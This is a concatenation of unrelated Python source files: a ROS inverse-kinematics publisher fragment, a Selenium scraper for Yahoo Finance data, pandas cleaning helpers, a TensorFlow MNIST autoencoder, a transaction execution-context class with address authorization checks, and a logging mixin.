                overwritten with the IK solution.
        """
        try:
            x = 0.350
            z = 0.400
            y = -0.200  # *m.sin(t.time()-t0)  -- static target; re-enable for a swept y
            pos = rob.iterIK([x, y, z])
            pos = pos[1:]  # drop the first solution element -- presumably a base value; TODO confirm
            print(pos)
            msg = Float64()
            print('Writing ')
            print(pos)
            for i in range(len(pos)):
                msg.data = pos[i]
                self.pubs[i].publish(msg)
        except KeyboardInterrupt:
            print('Execution Stopped.')


def main():
    """Build the kinematic model, run an FK/IK round-trip check, then publish."""
    Robot = robot()
    Robot.BuildKineModules()
    jts = [0, 10, 30, 0, 20, 0, 0]  # 7 values -- presumably base + 6 joints; TODO confirm
    a = Robot.GetEffectorPosition(jts)
    # IK of the FK pose, printed in degrees, as a round-trip sanity check.
    print(Robot.SetEffectorPosition(a) * 180 / m.pi)
    act = rosact()
    try:
        act.write(Robot)
    except KeyboardInterrupt:
        print('Execution stopped.')
    print('this shouldnt be displayed')


if __name__ == '__main__':
    main()
nilq/baby-python
python
import time from os import path from collections import defaultdict import pandas as pd from bs4 import BeautifulSoup from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.common.exceptions import TimeoutException, StaleElementReferenceException from utils import tools, COMPANYDIR from crawler.preprocessor import process_summary from localpaths import DOWNLOADPATH, DRIVERPATH, ID, PASSWORD # URLs def signinurl(): return "https://login.yahoo.com/" def summaryurl(t): return f"https://finance.yahoo.com/quote/{t}" def profileurl(t): return f"https://finance.yahoo.com/quote/{t}/profile?p={t}" def statisticsurl(t): return f"https://finance.yahoo.com/quote/{t}/key-statistics?p={t}" def incomestatementurl(t): return f"https://finance.yahoo.com/quote/{t}/financials?p={t}" def balancesheeturl(t): return f"https://finance.yahoo.com/quote/{t}/balance-sheet?p={t}" def cashflowurl(t): return f"https://finance.yahoo.com/quote/{t}/cash-flow?p={t}" def historyurl(t): return f"https://finance.yahoo.com/quote/{t}/history?p={t}" class ChromeDriver: def __init__(self, init, debug, headless=True): self.init = init self.debug = debug self.results = defaultdict(dict) if self.init or self.debug: self.currency_of_last_symbol = None self.last_symbol_is_stock = None self.stocks = [] self.currencys = [] self.timeout = 5 # how many seconds to wait self.max_trial = 3 # how many times to try self.init_driver(headless and not self.init) if self.init: self.signin() def init_driver(self, headless): """Initialize ChromeDriver.""" options = webdriver.ChromeOptions() if headless: options.add_argument("--headless") options.add_argument("--incognito") options.add_argument("--disable-notifications") options.add_argument("--user-agent" \ "=''Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \ " AppleWebKit/537.36 (KHTML, like Gecko)" \ " Chrome/74.0.3729.157 
Safari/537.36''") # Disable unnecessary driver tips for speedup # From https://github.com/dinuduke/Selenium-chrome-firefox-tips prefs = {"profile.managed_default_content_settings.images" : 2, "profile.default_content_setting_values.notifications" : 2, "profile.managed_default_content_settings.stylesheets" : 2, "profile.managed_default_content_settings.javascript" : 1, "profile.managed_default_content_settings.plugins" : 1, "profile.managed_default_content_settings.popups" : 2, "profile.managed_default_content_settings.geolocation" : 2, "profile.managed_default_content_settings.media_stream" : 2} if not self.init: # cookie must be enabled to sign in prefs["profile.managed_default_content_settings.cookies"] = 2 options.add_experimental_option("prefs", prefs) self.driver = webdriver.Chrome(DRIVERPATH, options=options) def signin(self): """Sign in to Yahoo Finance using ID and password saved in localpaths.py.""" self.driver.get(signinurl()) # send username WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "input[name='username']"))).send_keys(ID) # click 'Next' WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "input[name='signin']"))).click() # wait til password self.sleep(3) # send password WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "input[name='password']"))).send_keys(PASSWORD) # click submit WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "button[type='submit']"))).click() # wait til log-in self.sleep(3) def reset_last_symbol_info(self): self.stocks.append(self.last_symbol_is_stock) self.currencys.append(self.currency_of_last_symbol) self.last_symbol_is_stock = None self.currency_of_last_symbol = None def reboot(self): """Reboot driver.""" self.driver.quit() self.sleep(600) # rest for 10 minutes self.init_driver() self.signin() def close(self): """Close driver.""" 
self.driver.close() def quit(self): """Quit driver.""" self.driver.quit() def sleep(self, t=6): """Sleep crawler.""" return time.sleep(t) def parse(self, tr): """Parse row element from table into column and value.""" # choose any char not commonly used splitted = tr.get_text("|").split("|") val = (splitted[-1] if (col := splitted[0]) != "Earnings Date" else "".join(splitted[1:])) return col, val # column, value def save(self, col, symbol, data, sep=",", index_col=0, backup=True): """Save data.""" if not path.exists(dir_ := path.join(COMPANYDIR, symbol)): tools.mkdir(dir_) inpath = tools.get_path(col, symbol) if self.debug: if not path.exists(debugdir := path.join(dir_, "debug")): tools.mkdir(debugdir) inpath = tools.get_path(col, symbol, debug=self.debug) # backup if not self.debug and backup and path.exists(inpath): if not path.exists(backdir := path.join(dir_, "backup")): tools.mkdir(backdir) tools.cp(inpath, tools.get_path(col, symbol, backup=True)) # convert data to df if not isinstance(data, list): data = [data] curdf = pd.DataFrame(data) curdf["Date"] = curdf["Date"].apply(tools.to_date) curdf.set_index("Date", inplace=True) process_summary(curdf) if path.exists(inpath): # concatenate with existing file, remove any duplicate row maindf = tools.path2df(inpath, sep=sep, index_col=index_col) maindf = maindf[maindf.index != tools.get_today()] curdf = pd.concat([curdf, maindf], axis=0) # sort and save curdf.sort_index(ascending=False, inplace=True) curdf.to_csv(inpath, index=True) def is_stock(self): """Return True if corresponding symbol is a stock else False.""" try: # wait until sections are visible WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_all_elements_located(( By.CSS_SELECTOR, "div[id='quote-nav']>ul>li"))) for section in self.driver.find_elements_by_css_selector( "div[id='quote-nav']>ul>li"): if "Financials" in section.text: return True except TimeoutException: return None else: return False def get_currency(self): tmp = 
WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_element_located(( By.CSS_SELECTOR, "section[data-test='qsp-financial']>div>span>span"))).text if "." in tmp: tmp = tmp.split(".")[0].split(" ") # split first sentence return tmp[2] if len(tmp) == 3 else None return "USD" def finished(self, result): """Return True if all elements in result is True else False.""" return sum(result) == len(result) def exist(self, symbol): """Return True if symbol exists, else False.""" self.driver.get(summaryurl(symbol)) # check Summary section try: WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_element_located(( By.CSS_SELECTOR, "section[id='lookup-page']>section>div>h2"))) except TimeoutException: self.last_symbol_is_stock = self.is_stock() return True else: self.sleep() return False def mv_downloaded(self, symbol, from_, to_): """Move downloaded file from from_ to to_.""" tools.mv(path.join(DOWNLOADPATH, from_), tools.get_path(to_, symbol, debug=self.debug)) def crawl_summary(self, symbols): """Crawl data to get saved in symbol_summary.csv.""" for symbol in symbols: data = {"Date" : tools.get_today(), "Symbol" : symbol} # [Summary, Statistics] result = [False, False] for _ in range(self.max_trial): if not result[0]: # crawl summary section try: self.driver.get(summaryurl(symbol)) WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_all_elements_located((By.TAG_NAME, "table"))) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: html_content = self.driver.page_source soup = BeautifulSoup(html_content, "html.parser") for table in soup.find_all("table")[:2]: for tr in table.find_all("tr"): col, val = self.parse(tr) data[col] = val result[0] = True self.sleep(3) if not result[1]: try: self.driver.get(statisticsurl(symbol)) WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_element_located(( By.ID, "Main"))) except TimeoutException: pass except StaleElementReferenceException: self.reboot() 
else: html_content = self.driver.page_source soup = BeautifulSoup(html_content, "html.parser") for section in soup.find_all( "section", {"data-test":"qsp-statistics"}): for div in section.find_all("div"): children = list(div.children) if len(children) == 2 and children[0].text in { "Stock Price History", "Share Statistics"}: for tr in children[1].find_all("tr"): col, val = self.parse(tr) data[col] = val result[1] = True self.sleep(3) if self.finished(result): break name = "summary" if not self.finished(result): self.results[symbol][name] = result else: self.save(name, symbol, data) def crawl_history(self, symbol): """Crawl historical data. This includes: - Dividend history: symbol_dividend.csv - Stock price history: symbol_history.csv - Stock split history: symbol_stock_split.csv""" def download(): WebDriverWait(self.driver, self.timeout).until( # click arrow EC.element_to_be_clickable(( By.CSS_SELECTOR, "section>div>div>span>a"))).click() self.sleep(3) # wait to download def switch(to_): WebDriverWait(self.driver, self.timeout).until( # click Show EC.element_to_be_clickable(( By.CSS_SELECTOR, "section span>div[data-test='select-container']"))).click() menu = WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_element_located(( By.CSS_SELECTOR, "section span>div[data-test='historicalFilter-menu']"))) for d in menu.find_elements_by_tag_name("div"): if d.text == to_: d.click() break WebDriverWait(self.driver, self.timeout).until( #click Apply EC.element_to_be_clickable(( By.CSS_SELECTOR, "section>div>div>button"))).click() self.sleep(3) # wait to load def switch_max(): # click dropdown WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "section div[data-test='dropdown']>div"))).click() # click max WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "li>button[data-value='MAX']")) ).click() # wait to load self.sleep(3) global is_max is_max = True if 
self.last_symbol_is_stock: self.driver.get(historyurl(symbol)) is_max = False # [Historical Prices, Dividends Only, Stock Splits] result = [False, False, False] for _ in range(self.max_trial): downloaded = f"{symbol}.csv" if not result[0]: name = "history" if not self.debug and path.exists(tools.get_path(name, symbol)): result[0] = True else: try: if not is_max: switch_max() # download download() # move summary.csv to data dir self.mv_downloaded(symbol, downloaded, name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[0] = True if not result[1]: name = "Dividends Only" if not self.debug and path.exists(tools.get_path(name, symbol)): result[1] = True else: try: # switch to dividends switch(name) if not is_max: switch_max() # download download() # move divdend.csv to data dir self.mv_downloaded(symbol, downloaded, name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[1] = True if not result[2]: name = "Stock Splits" if not self.debug and path.exists(tools.get_path(name, symbol)): result[2] = True else: try: # switch to dividends switch(name) if not is_max: switch_max() # click download download() # move split.csv to data dir self.mv_downloaded(symbol, downloaded, name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[2] = True if self.finished(result): break self.driver.refresh() if not self.finished(result): self.results[symbol]["history"] = result self.sleep() def crawl_financials(self, symbol): """Crawl financial data. 
This includes: - Income Statement - Balance Sheet - Cash Flow""" def click_quarterly_and_download(): """Click 'Quarterly' and 'Download'.""" # click Quarterly WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "section[data-test='qsp-financial']>div>div>button")) ).click() self.sleep(3) # wait to load # click Download WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "section[data-test='qsp-financial'] div>span>button")) ).click() self.sleep(3) # wait to download if self.last_symbol_is_stock: # [Income Statement, Balance Sheet, Cash Flow] result = [False, False, False] for _ in range(self.max_trial): if not result[0]: name = "income_statement" if self.init or self.debug: try: self.driver.get(incomestatementurl(symbol)) self.currency_of_last_symbol = self.get_currency() if not path.exists(tools.get_path(name, symbol)): click_quarterly_and_download() self.mv_downloaded(symbol, f"{symbol}_quarterly_financials.csv", name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[0] = True if not result[1]: name = "balance_sheet" if not self.debug and path.exists(tools.get_path(name, symbol)): result[1] = True else: try: self.driver.get(balancesheeturl(symbol)) click_quarterly_and_download() self.mv_downloaded(symbol, f"{symbol}_quarterly_balance-sheet.csv", name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[1] = True if not result[2]: name = "cash_flow" if not self.debug and path.exists(tools.get_path(name, symbol)): result[2] = True else: try: self.driver.get(cashflowurl(symbol)) click_quarterly_and_download() self.mv_downloaded(symbol, f"{symbol}_quarterly_cash-flow.csv", name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[2] = True if self.finished(result): break if not self.finished(result): self.results[symbol]["financials"] = result 
self.sleep() def crawl_statistics(self, symbol): """Crawl statistics.csv.""" result = [False, False] data = {} self.driver.get(statisticsurl(symbol)) self.sleep(3) for _ in range(self.max_trial): name = "tmp" if not self.debug and path.exists(tools.get_path(name, symbol)): result[0] = True else: try: WebDriverWait(self.driver, self.timeout).until( EC.visibility_of_element_located(( By.ID, "Main"))) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: # crawl statistics with bs4 html_content = self.driver.page_source soup = BeautifulSoup(html_content, "html.parser") for section in soup.find_all( "section", {"data-test":"qsp-statistics"}): for div in section.find_all("div"): children = list(div.children) if len(children) == 2 and children[0].text in { "Fiscal Year", "Profitability", "Management Effectiveness", "Income Statement", "Balance Sheet", "Cash Flow Statement", "Dividends & Splits"}: for tr in children[1].find_all("tr"): col, val = self.parse(tr) data[col] = val self.save(name, symbol, data) result[0] = True name = "statistics" if not self.debug and path.exists(tools.get_path(name, symbol)): result[1] = True else: try: # download quarterly statistics WebDriverWait(self.driver, self.timeout).until( EC.element_to_be_clickable(( By.CSS_SELECTOR, "section[data-test='qsp-statistics'] div>span>button")) ).click() self.sleep() # move downloaded file to symbol dir self.mv_downloaded(symbol, f"{symbol}_quarterly_valuation_measures.csv", name) except TimeoutException: pass except StaleElementReferenceException: self.reboot() else: result[1] = True if self.finished(result): break if not self.finished(result): self.results[symbol]["statistics"] = result self.sleep() def crawl_profile_info(self, symbols): """Crawl 'Stock' and 'Currency' columns in stock_profile.csv.""" data = {"Stock" : [False for _ in range(len(symbols))], "Currency" : [None for _ in range(len(symbols))]} for i, symbol in enumerate(symbols): if self.exist(symbol): try: 
# crawl 'Stock' column is_stock = self.is_stock() self.sleep(3) # crawl 'Currency' column self.driver.get(incomestatementurl(symbol)) currency = self.get_currency() self.sleep(3) except: pass else: data["Stock"][i] = is_stock data["Currency"][i] = currency return data
nilq/baby-python
python
import pandas as pd
# NOTE: unused `matplotlib.pyplot` and `math` imports removed — nothing in
# this module referenced them.


class Frame():
    """Wrapper around a CSV loaded into a pandas DataFrame with small
    cleaning helpers (drop empty rows, split date/time, fix decimals)."""

    def __init__(self, path_):
        """Load the CSV at *path_* (or any file-like object)."""
        self.path = path_
        self.data = pd.read_csv(filepath_or_buffer=path_, delimiter=',')

    def clean(self, subs: bool):
        """Drop rows containing any NaN; if *subs*, forward-fill the
        remaining NaNs in every column except the first."""
        Ncol = len(self.data.columns)
        # thresh=Ncol keeps only rows where every column is non-null.
        self.data.dropna(inplace=True, thresh=Ncol, axis=0)  # drop empty lines
        if subs:
            for i in self.data.columns[1:]:
                # Assign back instead of fillna(..., inplace=True) on a column
                # slice, which triggers chained-assignment warnings.
                self.data[i] = self.data[i].ffill()

    def split_datetime(self, col: str, delimiter: str, dropit: bool):
        """Split *col* on *delimiter* into 'Fecha' (date) and 'Time'
        columns, then drop *col*.

        *dropit* is accepted for interface compatibility but unused.
        """
        field_split = self.data[col].str.split(delimiter)
        self.data['Fecha'] = field_split.apply(lambda x: x[0])
        self.data['Time'] = field_split.apply(lambda x: x[1])
        self.data.drop(col, axis=1, inplace=True)

    def dec_time(self, delimiter: str):
        """Convert the 'Time' column (h<delim>m<delim>s) into a decimal-hours
        'Hora' column."""
        field_split = self.data['Time'].str.split(delimiter)
        self.data['Hora'] = field_split.apply(
            lambda x: float(x[0]) + float(x[1]) / 60 + float(x[2]) / 3600)

    def check_decimals(self, col: str, digits: int, dropit: bool):
        """Rescale values of *col* so their integer part has *digits* digits,
        storing the result in '<col>ajus' and dropping *col*.

        *dropit* is accepted for interface compatibility but unused.
        """
        self.data[col + 'ajus'] = self.data[col].apply(
            lambda x: (x / (pow(10, len(str(round(x))) - digits)))
            if (digits != len(str(round(x)))) else x)
        self.data.drop(col, axis=1, inplace=True)


class Granularity():
    """Computes per-row 'sizzle' columns: absolute difference between each
    value and the previous row's value (0 for the first row)."""

    def __init__(self, df_):
        self.data = df_

    def SizzSub(self, col):
        """Add '<col>SizzSub' = |value - previous value| rounded to 4 places.

        Uses Series.diff(), which is positional and therefore also works on
        non-contiguous indexes (the previous label-based lookup assumed a
        default RangeIndex). The first row gets 0, matching the old code.
        """
        self.data[col + "SizzSub"] = (
            self.data[col].diff().fillna(0).round(4).abs())

    def SizzRep(self, col):
        """Add '<col>SizzRep' with the same |value - previous| computation.

        Fixes the original, which referenced an undefined name ``first_``
        (NameError) and had its output line commented out; the commented-out
        body showed the intended computation, restored here.
        """
        self.data[col + "SizzRep"] = (
            self.data[col].diff().fillna(0).round(4).abs())
nilq/baby-python
python
# Import tensorflow, matplotlib.pyplot, numpy and random used in this script.
import tensorflow as tf
import matplotlib.pyplot as plt
import numpy as np
import random

# Load the MNIST data set and one-hot encode the labels.
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("./mnist/data/", one_hot=True)

# Hyper-parameter settings
learning_rate = 0.01
training_epoch = 15
batch_size = 100
# Number of features (units) in the hidden layer
n_hidden = 300
# Input size: 28 x 28 pixels
n_input = 28*28

# Step 1: build the network (a one-hidden-layer autoencoder).
# Y is not declared as a placeholder — the target is the input itself.
X = tf.placeholder(tf.float32, [None, n_input])

# input -> encoder -> decoder -> output
# The encoder compresses the input to extract features.
W1 = tf.Variable(tf.random_normal([n_input,n_hidden]))
B1 = tf.Variable(tf.random_normal([n_hidden]))
# The decoder reconstructs the input, producing output as close as possible
# to the original input.
W2 = tf.Variable(tf.random_normal([n_hidden,n_input]))
B2 = tf.Variable(tf.random_normal([n_input]))

encoder = tf.nn.sigmoid(tf.add(tf.matmul(X,W1),B1))
decoder = tf.nn.sigmoid(tf.add(tf.matmul(encoder,W2),B2))

# The decoder must produce a result similar to the input.
Y = X

# Because the decoder output should match the input, the cost is the mean
# squared difference between decoder output and target. A large cost means
# the reconstruction differs a lot from the input.
cost = tf.reduce_mean(tf.pow(Y - decoder,2))
train = tf.train.AdamOptimizer(learning_rate).minimize(cost)

total_batch = int(mnist.train.num_examples/batch_size)

# Step 2: training loop
with tf.Session() as sess:
    init = tf.global_variables_initializer()
    sess.run(init)

    for epoch in range(training_epoch):
        sum_cost = 0
        for i in range(total_batch):
            # batch_ys (labels) is unused — the autoencoder is unsupervised.
            batch_xs, batch_ys = mnist.train.next_batch(batch_size)
            sess.run(train, feed_dict={X:batch_xs})
            sum_cost += sess.run(cost,feed_dict={X:batch_xs})
        print("Epoch:",epoch,"Avg Cost:",sum_cost/total_batch)

    print("Optimization finished")

    # Decode the first 10 test images and show originals (top row)
    # against reconstructions (bottom row).
    pred = sess.run(decoder,feed_dict={X:mnist.test.images[:10]})
    figure, axis = plt.subplots(2,10,figsize=(10,2))
    for i in range(10):
        axis[0][i].set_axis_off()
        axis[1][i].set_axis_off()
        axis[0][i].imshow(np.reshape(mnist.test.images[i],(28,28)))
        axis[1][i].imshow(np.reshape(pred[i],(28,28)))
    plt.show()
nilq/baby-python
python
def kw_only_args(*, kwo):
    """Fixture: a function whose only parameter is keyword-only."""
    pass


def kw_only_args_with_varargs(*varargs, kwo, another='default'):
    """Fixture: *varargs followed by a required and a defaulted
    keyword-only parameter."""
    pass
nilq/baby-python
python
# Copyright 2017 NTRLab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------

import logging
import uuid
from threading import Condition
from threading import Lock

LOGGER = logging.getLogger(__name__)


class AuthorizationException(Exception):
    """Raised when a transaction reads or writes an address it did not
    declare in its inputs/outputs."""

    def __init__(self, address):
        super(AuthorizationException, self).__init__(
            "Not authorized to read/write to {}".format(address))


class ExecutionContext(object):
    """A thread-safe data structure holding address-_ContextFuture pairs
    and the addresses that can be written to and read from.
    """

    def __init__(self, state_hash, read_list, write_list, base_context_ids):
        """
        Args:
            state_hash: the Merkle root
            read_list (list of str): Addresses that were listed as inputs
                on the transaction.
            write_list (list of str): Addresses that were listed as outputs
                on the transaction.
            base_context_ids (list of str): Context ids of contexts that
                this context is based off of.
        """
        self._state_hash = state_hash

        # Create copies of the read and write lists
        self._read_list = read_list.copy()
        self._write_list = write_list.copy()

        # address (str) -> _ContextFuture; guarded by self._lock
        self._state = {}
        self._lock = Lock()

        self._read_only = False

        self.base_contexts = base_context_ids

        # Unique id for this context.
        self._id = uuid.uuid4().hex

        self._execution_data = []
        self._execution_events = []

    @property
    def session_id(self):
        # Unique identifier of this context.
        return self._id

    @property
    def merkle_root(self):
        # State root hash this context was created against.
        return self._state_hash

    def _contains_and_deleted(self, address):
        # True when the address has a future AND was deleted in this context.
        #LOGGER.debug('ExecutionContext:_contains_and_deleted "%s"', address)
        return address in self._state and \
            self._state[address].deleted_in_context()

    def _contains_and_set(self, address):
        # True when the address has a future AND a value was set here.
        return address in self._state and self._state[address].set_in_context()

    def _contains_and_not_set(self, add):
        # True when the address has a future but no value was set here.
        return add in self._state and not self._state[add].set_in_context()

    def _contains(self, address):
        return address in self._state

    def __contains__(self, item):
        with self._lock:
            return self._contains(item)

    def _get(self, address):
        # Return the future's value, or None if the address is unknown.
        # NOTE: .result() may block until the merkle-tree prefetch completes.
        value = None
        if self._contains(address):
            value = self._state[address].result()
        return value

    def _get_if_set(self, address):
        # Value only if it was explicitly set in this context, else None.
        value = None
        if self._contains_and_set(address):
            value = self._state[address].result()
        return value

    def _get_if_deleted(self, address):
        # Echo the address back if it was deleted in this context, else None.
        add = None
        if self._contains_and_deleted(address=address):
            add = address
        return add

    def _get_if_not_set(self, address):
        # Value only if the address is present but was never set here.
        value = None
        if self._contains_and_not_set(address):
            value = self._state[address].result()
        return value

    def is_read_only(self):
        return self._read_only

    def make_read_only(self):
        """Freeze the context: wait for pending futures, then reject writes."""
        with self._lock:
            if not self._read_only:
                for fut in self._state.values():
                    fut.make_read_only()
                self._read_only = True

    def get(self, addresses):
        """Returns the value in this context, or None, for each address in
        addresses. Useful for gets on the context manager.

        Args:
            addresses (list of str): The addresses to return values for, if
                within this context.

        Returns:
            results (list of bytes): The values in state for these addresses.

        Raises:
            AuthorizationException: if an address is not in the read list.
        """
        with self._lock:
            results = []
            for add in addresses:
                self.validate_read(add)
                results.append(self._get(add))
            return results

    def get_if_set(self, addresses):
        """Returns the value set in this context, or None, for each address
        in addresses.

        Args:
            addresses (list of str): The addresses to return values for, if
                set within this context.

        Returns:
            (list): bytes set at the address or None
        """
        with self._lock:
            results = []
            for add in addresses:
                results.append(self._get_if_set(add))
            return results

    def get_if_deleted(self, addresses):
        """Returns a list of addresses that have been deleted, or None if
        it hasn't been deleted.

        Args:
            addresses (list of str): The addresses to check if deleted.

        Returns:
            (list of str): The addresses, if deleted, or None.
        """
        with self._lock:
            results = []
            for add in addresses:
                results.append(self._get_if_deleted(add))
            return results

    def get_if_not_set(self, addresses):
        """Returns the value at an address if it was an input to the txn but
        never set. It returns None if that address was never set in the
        merkle database, or if the address is not within the context.

        Args:
            addresses (list of str): The full 70 character addresses.

        Returns:
            (list): bytes at that address but not set within the context
        """
        with self._lock:
            results = []
            for add in addresses:
                results.append(self._get_if_not_set(add))
            return results

    def get_all_if_set(self):
        """Return all the addresses and opaque values set in the context.
        Useful in the squash method.

        Returns:
            (dict of str to bytes): The addresses and bytes that have
                been set in the context.
        """
        with self._lock:
            results = {}
            for add, fut in self._state.items():
                if self._contains_and_set(add):
                    results[add] = fut.result()
            return results

    def get_all_if_deleted(self):
        """Return all the addresses deleted in the context.
        Useful in the squash method.

        Returns:
            (dict of str to bytes): The addresses and bytes that have
                been deleted in the context.
        """
        with self._lock:
            results = {}
            for add, fut in self._state.items():
                if self._contains_and_deleted(add):
                    results[add] = fut.result()
            return results

    def create_prefetch(self, addresses):
        """Create futures needed before starting the process of reading the
        address's value from the merkle tree.

        Args:
            addresses (list of str): addresses in the txn's inputs that
                aren't in any base context (or any in the chain).
        """
        with self._lock:
            for add in addresses:
                self._state[add] = _ContextFuture(address=add,
                                                  wait_for_tree=True)

    def create_initial(self, address_values):
        """Create futures from inputs with the current value for that
        address at the start of that context.

        Args:
            address_values (list of tuple): The tuple is string, bytes of
                the address and value.
        """
        with self._lock:
            for add, val in address_values:
                self._state[add] = _ContextFuture(address=add, result=val)

    def set_from_tree(self, address_value_dict):
        """Set the result for each future at the given addresses with the
        value stored in the merkle database.

        Args:
            address_value_dict (dict of str: bytes): The unique
                full addresses that the bytes values should be set with.
        """
        #LOGGER.debug('set_from_tree: %s\n',address_value_dict)
        for address, value in address_value_dict.items():
            if address in self._state:
                self._state[address].set_result(result=value,
                                                from_tree=True)

    def delete_direct(self, addresses):
        """Called in the context manager's delete method to either mark an
        entry for deletion , or create a new future and immediately set it
        for deletion in the future.

        Args:
            addresses (list of str): The unique full addresses.

        Raises:
            AuthorizationException
        """
        with self._lock:
            for address in addresses:
                self._validate_write(address)
                if address in self._state:
                    self._state[address].set_deleted()
                else:
                    fut = _ContextFuture(address=address)
                    self._state[address] = fut
                    fut.set_deleted()

    def set_direct(self, address_value_dict):
        """Called in the context manager's set method to either overwrite
        the value for an address, or create a new future and immediately
        set a value in the future.

        Args:
            address_value_dict (dict of str:bytes): The unique full addresses
                with bytes to set at that address.

        Raises:
            AuthorizationException
        """
        with self._lock:
            for address, value in address_value_dict.items():
                self._validate_write(address)
                if address in self._state:
                    self._state[address].set_result(result=value)
                else:
                    fut = _ContextFuture(address=address)
                    self._state[address] = fut
                    fut.set_result(result=value)

    def _validate_write(self, address):
        """Raises an exception if the address is not allowed to be set
        in this context, based on txn outputs.

        Notes:
            Checks that the address is either listed fully as one of the
            outputs, or some portion of the address is listed as a namespace
            in the outputs of the txn.

        Args:
            address (str): The address to be validated. The context manager
                validates the address correctness (70 hex characters).

        Returns:
            None

        Raises:
            AuthorizationException
        """
        if not any(address.startswith(ns) for ns in self._write_list):
            raise AuthorizationException(address=address)

    def validate_read(self, address):
        """Raises an exception if the address is not allowed to be read in
        this context, based on txn inputs.

        Args:
            address (str): An address to be validated.

        Returns:
            None

        Raises:
            AuthorizationException
        """
        if not any(address.startswith(ns) for ns in self._read_list):
            raise AuthorizationException(address=address)

    def add_execution_data(self, data):
        """Append opaque execution data produced by the transaction."""
        with self._lock:
            self._execution_data.append(data)

    def get_execution_data(self):
        """Return a copy of the accumulated execution data."""
        with self._lock:
            return self._execution_data.copy()

    def add_execution_event(self, event):
        """Append an event emitted by the transaction."""
        with self._lock:
            self._execution_events.append(event)

    def get_execution_events(self):
        """Return a copy of the accumulated execution events."""
        with self._lock:
            return self._execution_events.copy()


class _ContextFuture(object):
    """Controls access to bytes set in the _result variable. The booleans
    that are flipped in set_result, based on whether the value is being set
    from the merkle tree or a direct set on the context manager are needed
    to later determine whether the value was set in that context or was
    looked up as a new address location from the merkle tree and then only
    read from, not set.

    Lifecycle summary: a future is created either with a known value
    (input present in a base context), as a pre-fetch placeholder that
    waits on the merkle tree (wait_for_tree=True), or lazily on first
    write (output-only addresses). Reads block until either the tree or a
    direct context write supplies a value; a direct context write always
    takes precedence over a later value arriving from the tree.
    """

    def __init__(self, address, result=None, wait_for_tree=False):
        self.address = address
        self._result = result
        # True once a value was set directly in the context (not from tree).
        self._result_set_in_context = False
        self._condition = Condition()
        # If True, readers must wait until the merkle-tree prefetch lands.
        self._wait_for_tree = wait_for_tree
        self._tree_has_set = False
        self._read_only = False
        self._deleted = False

    def make_read_only(self):
        # Block until a value is available, then freeze against writes.
        with self._condition:
            if self._wait_for_tree and not self._result_set_in_context:
                self._condition.wait_for(
                    lambda: self._tree_has_set or self._result_set_in_context)

            self._read_only = True

    def set_in_context(self):
        with self._condition:
            return self._result_set_in_context

    def deleted_in_context(self):
        with self._condition:
            return self._deleted

    def result(self):
        """Return the value at an address, optionally waiting until it is
        set from the context_manager, or set based on the pre-fetch mechanism.

        Returns:
            (bytes): The opaque value for an address.
        """
        # Read-only futures can no longer change, so skip the lock.
        if self._read_only:
            return self._result
        with self._condition:
            if self._wait_for_tree and not self._result_set_in_context:
                self._condition.wait_for(
                    lambda: self._tree_has_set or self._result_set_in_context)
            return self._result

    def set_deleted(self):
        # NOTE(review): unlike set_result, not guarded by _condition —
        # callers hold ExecutionContext._lock; confirm that is sufficient.
        self._result_set_in_context = False
        self._deleted = True

    def set_result(self, result, from_tree=False):
        """Set the addresses's value unless the future has been declared
        read only.

        Args:
            result (bytes): The value at an address.
            from_tree (bool): Whether the value is being set by a read from
                the merkle tree.

        Returns:
            None
        """
        # Double-checked: fast unlocked read-only test, re-checked under
        # the condition lock before mutating.
        if self._read_only:
            if not from_tree:
                LOGGER.warning("Tried to set address %s on a"
                               " read-only context.",
                               self.address)
            return

        with self._condition:
            if self._read_only:
                if not from_tree:
                    LOGGER.warning("Tried to set address %s on a"
                                   " read-only context.",
                                   self.address)
                return
            if from_tree:
                # If the result has not been set in the context, overwrite the
                # value with the value from the merkle tree. Otherwise, do
                # nothing.
                if not self._result_set_in_context:
                    self._result = result
                    self._tree_has_set = True
            else:
                self._result = result
                self._result_set_in_context = True
                self._deleted = False

            self._condition.notify_all()
python
import logging from logging.config import dictConfig def setup(conf): dictConfig(conf) class LoggerMixIn: def __init__(self, *args, **kwargs): logger_name = getattr(self, "__logger_name__", self.__class__.__name__) self.logger = logging.getLogger(logger_name) for lvl in ["CRITICAL", "DEBUG", "INFO", "WARN", "WARNING", "ERROR", "FATAL"]: setattr(self.logger, lvl, getattr(logging, lvl)) super().__init__(*args, **kwargs)
